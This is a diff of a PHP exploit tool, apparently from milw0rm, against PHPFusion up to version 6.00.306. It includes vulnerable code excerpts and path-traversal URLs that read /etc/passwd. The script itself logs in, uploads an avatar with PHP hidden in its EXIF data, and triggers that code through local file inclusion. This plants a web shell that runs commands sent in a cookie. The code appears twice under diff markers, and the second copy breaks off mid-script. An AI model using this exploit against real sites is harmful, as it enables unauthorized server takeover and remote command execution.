- - $settings['locale'] var is not properly sanitized before to be used to - include files so, if register_globals=on & magic_quotes_gpc=Off, - you can include local resources, poc: - - http://[target]/[path]infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=../../../../../../../../../etc/passw%00 - http://[target]/[path]infusions/last_seen_users_panel/last_seen_users_panel.php?cmd=ls%20-la&settings[locale]=../../../../images/avatars/suntzu[1].jpg%00 - - A note: if INFUSIONS constant is not defined, PHP will assume it as it is, - as "INFUSIONS" string. On some system , no matters if "INFUSIONSlast_seen_users_panel/locale/........" - path does not exist, you will go up from the non-existent dir of exactly four - dirs to include the malicious avatar. - This works against on 6.00.306 - - iii) vulnerable code in setup.php at lines 14-15: - - ... - $localeset = (isset($_GET['localeset']) ? $_GET['localeset'] : "English"); - include "locale/".$localeset."/setup.php"; - ... 
- - if this script is not deleted after installation, if magic_quotes_gpc=Off, - you can include files from locale resources, poc: - - http://[target]/[path]/setup.php?localeset=../../../../../../../../../../etc/passwd%00 - http://[target]/[path]/setup.php?cmd=ls%20-la&localeset=../images/avatars/suntzu[1].jpg%00 - - this tool tries to exploit all theese vulnerabilities, you need a valid user - account to upload avatars -*/ - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; - -} -function sendpacketiii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - fclose($ock); - #debug - #echo "\r\n".$html; - -} -$host=$argv[1]; -$path=$argv[2]; -$username=$argv[3]; -$pass=$argv[4]; -$cmd="";$port=80;$proxy=""; -for ($i=5; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -$mypaths= array ( - 'images/avatars/', - '', - 'infusions/last_seen_users_panel/' - ); - -echo "step 0 -> Check if suntzu.php is already installed...\r\n"; -for ($i=0; $i<=count($mypaths)-1; $i++) -{ -$packet ="GET ".$p.$mypaths[$i]."suntzu.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=".$cmd.";\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (strstr($html,"56789")) -{ - echo "Exploit succeeded..."; - $temp=explode("56789",$html); - die("\r\n".$temp[1]."\r\n"); -} -} - -echo "step 1 -> login...\r\n"; -$data ="user_name=".urlencode(trim($username)); -$data.="&user_pass=".urlencode(trim($pass)); -$data.="&login=Login"; -$packet="POST ".$p."news.php HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; -$packet.="Referer: http://".$host.$path."news.php\r\n"; -$packet.="Accept-Language: en\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Keep-Alive\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -$temp=explode("Set-Cookie: ",$html); -$temp2=explode(' ',$temp[1]); -$cookie=$temp2[0]; -echo 'Your cookie: '.$cookie."\r\n"; -$temp=explode("fusion_user=",$cookie); -$temp2=explode(".",$temp[1]); -$user_id=trim($temp2[0]); -echo 'Your user id: '.$user_id."\r\n"; - -echo "step 2 -> upload a malicious avatar with php code inside...\r\n"; -$avatar=".php.php.gif-fakechars-"; -$shell= -chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f). 
-chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70). -chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22). -chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70). -chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29). -chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73). -chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f). -chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f). -chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74). -chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73). -chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f). -chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29). -chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74). -chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71). -chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70). -chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24). -chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b). -chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72). -chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65). -chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f). -chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d). -chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20). -chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61). -chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c). -chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45). 
-chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65). -chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38). -chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d). -chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28). -chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63). -chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75). -chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70). -chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d). -chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a). -chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00). -chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00). -chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). 
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff). -chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01). -chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03). -chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08). -chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4). -chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00). -chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03). -chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f). 
-chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00); - -/* -this image has this code inside as EXIF metadata content -<?php -$fp=fopen("suntzu.php","w"); -fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>"); -fclose($fp); -chmod("suntzu.php",777); -?> -*/ - -$data='-----------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_name" - -'.$username.' ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_newpassword" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_newpassword2" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_email" - -succcccccp@hotmail.com ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_hide_email" - -1 ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_location" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_month" - --- ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_day" - --- ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_year" - ----- ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_aim" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_icq" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_msn" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_yahoo" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_web" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_theme" - -Default ------------------------------7d6ee3a7074a 
-Content-Disposition: form-data; name="user_offset" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_avatar"; filename="'.$avatar.'" -Content-Type: application/octet-stream - -'.$shell.' ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_sig" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_hash" - -'.md5($pass).' ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="update_profile" - -Update Profile ------------------------------7d6ee3a7074a-- -'; - - -$packet ="POST ".$p."edit_profile.php? HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; -$packet.="Referer: http://".$host.$path."edit_profile.php\r\n"; -$packet.="Accept-Language: en\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Keep-Alive\r\n"; -$packet.="Cookie: fusion_visited=yes; ".$cookie." 
PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n"; -$packet.="Cache-Control: no-cache\r\n\r\n"; -$packet.=$data; -sendpacketiii($packet); - -echo "step 3 -> try to launch code inside image before has chmod()...\r\n"; -for ($i=0; $i<=9; $i++) -{ -$packet ="GET ".$p."images/avatars/.php.php[".$user_id."].gif-fakechars- HTTP/1.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -} - -echo "step 3b -> try to include through last_seen_users_panel.php\r\n"; -//works with register_globals=on & magic_quotes_gpc=off -$xpl=urlencode("../../../../images/avatars/.php.php[".$user_id."].gif-fakechars-".chr(0x00)); -$packet ="GET ".$p."infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=$xpl HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); - -echo "step 3c -> try to include through setup.php script\r\n"; -//works with magic_quotes_gpc=off -$xpl=urlencode("../images/avatars/.php.php[".$user_id."].gif-fakechars-".chr(0x00)); -$packet ="GET ".$p."setup.php?localeset=$xpl HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); - -echo "step 4 -> delete avatar...\r\n"; -$data='-----------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_name" - -'.$username.' 
------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_newpassword" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_newpassword2" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_email" - -whattttt@hotmail.com ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_hide_email" - -1 ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_location" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_month" - --- ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_day" - --- ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_year" - ----- ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_aim" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_icq" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_msn" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_yahoo" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_web" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_theme" - -Default ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_offset" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_avatar"; filename="whatever" -Content-Type: application/octet-stream - -what ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_sig" - - ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="user_hash" - -'.md5($pass).' 
------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="update_profile" - -Update Profile ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="del_avatar" - -y ------------------------------7d6ee3a7074a-- -'; - -$packet ="POST ".$p."edit_profile.php HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; -$packet.="Referer: http://".$host.$path."edit_profile.php\r\n"; -$packet.="Accept-Language: en\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Keep-Alive\r\n"; -$packet.="Cookie: fusion_visited=yes; ".$cookie." PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n"; -$packet.="Cache-Control: no-cache\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); - -echo "step 5 -> launch commands...\r\n"; -for ($i=0; $i<=count($mypaths)-1; $i++) -{ -$packet ="GET ".$p.$mypaths[$i]."suntzu.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=".$cmd.";\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (strstr($html,"56789")) -{ - echo "Exploit succeeded..."; - $temp=explode("56789",$html); - die("\r\n".$temp[1]."\r\n"); -} -} -//if you are here... -echo "\r\nExploit failed..."; -?> - -# milw0rm.com [2006-05-07] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "PHPFusion <= v6.00.306 avatar mod_mime arbitrary file upload &\r\n"; +echo "local inclusion vulnerabilities\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; + +if ($argc<6) { +echo "Usage: php ".$argv[0]." 
host path user pass cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to PHPFusion\r\n"; +echo "cmd: a shell command\r\n"; +echo "user/pass: you need a valid user account to upload an avatar\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /phpfusion/ your_username password cat ./../../config.php\r\n"; +echo "php ".$argv[0]." localhost /phpfusion/ your_username password ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n"; +die; +} + +/* explaination: + + software site: http://www.php-fusion.co.uk/ + + description: "a light-weight open-source content management system (CMS) + written in PHP. It utilises a mySQL database to store your site content and + includes a simple, comprehensive adminstration system." + + tested versions: PHPFusion v6.00.306 + PHPFusion v6.00.207 + PHPFusion v6.00.110 + + + i) vulnerable code in includes/update_profile_include.php at lines 69-90: + + ... 
+ $newavatar = $_FILES['user_avatar']; + if ($userdata['user_avatar'] == "" && !empty($newavatar['name']) && is_uploaded_file($newavatar['tmp_name'])) { + if (preg_match("/^[-0-9A-Z_\.\[\]]+$/i", $newavatar['name']) && $newavatar['size'] <= 30720) { + $avatarext = strrchr($newavatar['name'],"."); + if (eregi(".gif", $avatarext) || eregi(".jpg", $avatarext) || eregi(".png", $avatarext)) { + $avatarname = substr($newavatar['name'], 0, strrpos($newavatar['name'], ".")); + $avatarname = $avatarname."[".$userdata['user_id']."]".$avatarext; + $set_avatar = "user_avatar='$avatarname', "; + move_uploaded_file($newavatar['tmp_name'], IMAGES."avatars/".$avatarname); + chmod(IMAGES."avatars/".$avatarname,0644); + if ($size = @getimagesize(IMAGES."avatars/".$avatarname)) { + if ($size['0'] > 100 || $size['1'] > 100) { + unlink(IMAGES."avatars/".$avatarname); + $set_avatar = ""; + } + } else { + unlink(IMAGES."avatars/".$avatarname); + $set_avatar = ""; + } + } + } + } + ... + + A remote user can upload a malicious avatar with multiple extensions, + (ex.: .php.php.gif-fakechars-) and with php code inside as EXIF metadata + content. + It seems that Apache mod_mime module considers double-extension files like + file.php.gif[somefakechars] to be valid PHP files and runs the arbitrary + code that has been uploaded. Actually I can't say which Apache versions, this + was tested against Apache/1.3.27 with PHP/4.3.3 + + A note: file is renamed like this + .php.php[user_id].gif-fakechars- + + ii) vulnerable code in infusions/last_seen_users_panel/last_seen_users_panel.php + at lines 12-16: + + ... + if (file_exists(INFUSIONS."last_seen_users_panel/locale/".$settings['locale'].".php")) { + include INFUSIONS."last_seen_users_panel/locale/".$settings['locale'].".php"; +} else { + include INFUSIONS."last_seen_users_panel/locale/English.php"; +} + ... 
+ + $settings['locale'] var is not properly sanitized before to be used to + include files so, if register_globals=on & magic_quotes_gpc=Off, + you can include local resources, poc: + + http://[target]/[path]infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=../../../../../../../../../etc/passw%00 + http://[target]/[path]infusions/last_seen_users_panel/last_seen_users_panel.php?cmd=ls%20-la&settings[locale]=../../../../images/avatars/suntzu[1].jpg%00 + + A note: if INFUSIONS constant is not defined, PHP will assume it as it is, + as "INFUSIONS" string. On some system , no matters if "INFUSIONSlast_seen_users_panel/locale/........" + path does not exist, you will go up from the non-existent dir of exactly four + dirs to include the malicious avatar. + This works against on 6.00.306 + + iii) vulnerable code in setup.php at lines 14-15: + + ... + $localeset = (isset($_GET['localeset']) ? $_GET['localeset'] : "English"); + include "locale/".$localeset."/setup.php"; + ... 
+ + if this script is not deleted after installation, if magic_quotes_gpc=Off, + you can include files from locale resources, poc: + + http://[target]/[path]/setup.php?localeset=../../../../../../../../../../etc/passwd%00 + http://[target]/[path]/setup.php?cmd=ls%20-la&localeset=../images/avatars/suntzu[1].jpg%00 + + this tool tries to exploit all theese vulnerabilities, you need a valid user + account to upload avatars +*/ + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; + +} +function sendpacketiii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + fclose($ock); + #debug + #echo "\r\n".$html; + +} +$host=$argv[1]; +$path=$argv[2]; +$username=$argv[3]; +$pass=$argv[4]; +$cmd="";$port=80;$proxy=""; +for ($i=5; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +$mypaths= array ( + 'images/avatars/', + '', + 'infusions/last_seen_users_panel/' + ); + +echo "step 0 -> Check if suntzu.php is already installed...\r\n"; +for ($i=0; $i<=count($mypaths)-1; $i++) +{ +$packet ="GET ".$p.$mypaths[$i]."suntzu.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: cmd=".$cmd.";\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +if (strstr($html,"56789")) +{ + echo "Exploit succeeded..."; + $temp=explode("56789",$html); + die("\r\n".$temp[1]."\r\n"); +} +} + +echo "step 1 -> login...\r\n"; +$data ="user_name=".urlencode(trim($username)); +$data.="&user_pass=".urlencode(trim($pass)); +$data.="&login=Login"; +$packet="POST ".$p."news.php HTTP/1.0\r\n"; +$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; +$packet.="Referer: http://".$host.$path."news.php\r\n"; +$packet.="Accept-Language: en\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; 